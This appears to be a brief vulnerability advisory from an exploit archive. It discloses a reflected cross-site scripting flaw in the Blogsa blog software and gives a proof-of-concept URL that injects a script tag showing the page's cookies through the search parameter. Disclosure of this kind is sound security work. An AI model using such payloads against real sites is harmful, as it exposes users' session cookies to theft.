Blogsa versions 1.0 Beta 3 and below suffer from a cross site scripting vulnerability.
726407a7afa60b9becff57b57418976454485f050bc0c47529f0cf04a77063f9###########################################################
# Software: Blogsa <= 1.0 Beta 3 XSS Vulnerability #
# Software Site: blogsa.net #
# Discovered by: Onur YILMAZ aka DJR #
# Blog: http://www.onuryilmaz.info #
# E-mail: contact<at>onuryilmaz<dot>info #
###########################################################
# XSS
http://localhost/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>
# Screen
http://img14.imageshack.us/img14/7803/12371681.jpg
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed